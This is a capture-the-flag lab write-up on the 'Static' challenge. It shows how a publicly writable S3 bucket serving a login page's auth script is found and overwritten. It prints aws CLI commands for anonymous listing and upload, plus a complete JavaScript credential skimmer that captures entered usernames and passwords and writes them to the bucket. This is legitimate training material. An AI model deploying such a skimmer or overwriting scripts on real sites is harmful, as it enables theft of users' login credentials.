Static

Challenge Lab (Medium) - by Tyler Ramsbey

CourseStackwww.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

---

Scenario

As a member of the Hack Smarter Red Team, you've been assigned a web application penetration test on a client's employee portal. During the scoping call, you also learned the client uses AWS for their website architecture.

In preparation for an upcoming Red Team Engagement, your task is to figure out a way to steal credentials from the website when employees log in. The final flag is the password for a user named "tyler".

Summary

Summary

In static we assess a cloud-hosted employee portal and identify an externally loaded authentication script served from an Amazon S3 bucket. Enumerating the bucket reveals misconfigured public access permissions, allowing both unauthenticated read and write operations. Exploiting this, we upload a malicious replacement for the site's auth-module.js that intercepts login attempts, captures submitted credentials, and writes them back to the same bucket. After deployment, the compromised script records valid user logins, enabling retrieval of the stored credentials and successful authentication as tyler. This demonstrates the severe impact of insecure S3 bucket permissions and client-side supply chain compromise within cloud-integrated web applications.

Recon

We start the scenario and get the following website in scope.

We do not perform a port scan and initially enumerate the page manually. When visiting the site, we are redirected to a login page.

http://34.234.214.148/login.html

If we look at the source of the page, we see that a JavaScript auth module is included externally via an AWS S3 bucket. If we look at the script, we simply see an output on the console indicating that an authentication module has been loaded.

A possible attack vector could now be to find further sensitive information from the bucket or even replace the script with our own in order to send the credentials entered in the form to our server or write them to the bucket itself, if we had write access.

https://cg-assets-cgid8qdfs5agl4.s3.amazonaws.com/auth-module.js

AWS enumeration

From the URL of the auth module, we identify the following bucket:

cg-assets-cgid8qdfs5agl4

We try to lists the contents of theAmazon S3 bucket cg-assets-cgid8qdfs5agl4 without using AWS credentials. We see we are able to list the files in the bucket, indicating that the bucket allows anonymous access.

aws s3 ls s3://cg-assets-cgid8qdfs5agl4 --no-sign-request

Next, we try to test if we can write without authentication to the bucket with the following command, and see the test.txt file inside the bucket. We are able to write to the bucket, which would enable us the pictured attack in the beginning: replacing the auth-module.js with a malicous one, that caputres the entered credentials.

echo "test-write" > test.txt

aws s3 cp test.txt s3://cg-assets-cgid8qdfs5agl4/test.txt --no-sign-request

Access as tyler

Since we are able to write to the S3 bucket we prepare a malicious auth-module.js.

The following script waits for the login page to load, then hooks the Sign In button so that whenever it is clicked, it reads the values entered into the username and password fields. It formats those credentials as plain text and uploads them as a new file to the same S3 bucket using an unauthenticated HTTP PUT request.

malicious-auth-module.js

console.log("Hacksmarter Auth Module v1.2 loaded.");

document.addEventListener("DOMContentLoaded", () => {
    const btn = document.getElementById("login-btn");

    if (!btn) return;

    btn.addEventListener("click", () => {
        const u = document.getElementById("username")?.value;
        const p = document.getElementById("password")?.value;

        if (!u || !p) return;

        const data = `username=${u}\npassword=${p}\n`;

        const filename = `creds-${Date.now()}.txt`;
        const url = `https://cg-assets-cgid8qdfs5agl4.s3.amazonaws.com/${filename}`;

        fetch(url, {
            method: "PUT",
            headers: {
                "Content-Type": "text/plain"
            },
            body: data
        }).then(res => {
            console.log("Credential write attempt:", res.status);
        }).catch(err => {
            console.log("Credential write failed");
        });
    });
});

We overwrite the auth module...

aws s3 cp auth-module.js s3://cg-assets-cgid8qdfs5agl4/auth-module.js --no-sign-request

... and after a short duration we see the creds uploaded.

aws s3 ls s3://cg-assets-cgid8qdfs5agl4 --no-sign-request

We inspect the created creds file and are able to retrieve tylers password.

curl -s https://cg-assets-cgid8qdfs5agl4.s3.amazonaws.com/creds-1767524097751.txt -o creds-1767524097751.txt